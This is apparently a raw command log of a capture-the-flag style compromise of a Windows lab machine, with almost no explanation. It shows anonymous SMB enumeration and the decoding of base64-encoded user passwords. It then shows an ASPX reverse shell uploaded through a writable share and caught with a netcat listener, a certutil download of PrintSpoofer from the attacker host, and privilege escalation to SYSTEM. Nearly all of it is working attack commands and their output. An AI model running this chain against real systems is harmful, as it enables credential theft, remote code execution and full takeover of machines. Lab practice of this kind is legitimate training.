


в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# smbclient -L //10.201.16.210/ -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	nt4wrksv        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.201.16.210 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
                                                                                                                     
в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# smbclient //10.201.16.210/nt4wrksv -N 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jul 25 17:46:04 2020
  ..                                  D        0  Sat Jul 25 17:46:04 2020
  passwords.txt                       A       98  Sat Jul 25 11:15:33 2020

		7735807 blocks of size 4096. 4936292 blocks available
smb: \> 


в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# cat passwords.txt 
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                     

в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# echo 'Qm9iIC0gIVBAJCRXMHJEITEyMw==' > b64                                      
                                                                                                                     
в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# base64 -d b64
Bob - !P@$$W0rD!123                                                                                                                     

в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# echo 'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' > b64
                                                                                                                     
в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# base64 -d b64                                        
Bill - Juw4nnaM4n420696969!$$$                                                                                                                     
в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# 


change ip address



https://github.com/borjmz/aspx-reverse-shell/blob/master/shell.aspx

we can  visit and view smb contents on 

http://10.65.146.55:49663/nt4wrksv/passwords.txt


в”Њв”Ђв”Ђ(rootг‰їkali)-[~kali]
в””в”Ђ# smbclient //10.65.146.55/nt4wrksv -N                                          
Try "help" to get a list of possible commands.
smb: \> put borjmzrevshell.aspx 
putting file borjmzrevshell.aspx as \borjmzrevshell.aspx (202.4 kb/s) (average 202.4 kb/s)
smb: \> 

visit the file on 49663

в”Њв”Ђв”Ђ(rootг‰їkali)-[/home/kali]
в””в”Ђ# rlwrap -cAr nc -lvnp 53 
listening on [any] 53 ...
connect to [192.168.141.97] from (UNKNOWN) [10.65.146.55] 49826
Spawn Shell...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool




c:\windows\system32\inetsrv>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\windows\system32\inetsrv>


c:\Users\Bob\Desktop>certutil.exe -f -urlcache http://192.168.141.97/PrintSpoofer64.exe PrintSpoofer.exe
certutil.exe -f -urlcache http://192.168.141.97/PrintSpoofer64.exe PrintSpoofer.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Users\Bob\Desktop>PrintSpoofer.exe -i -c cmd.exe
PrintSpoofer.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>




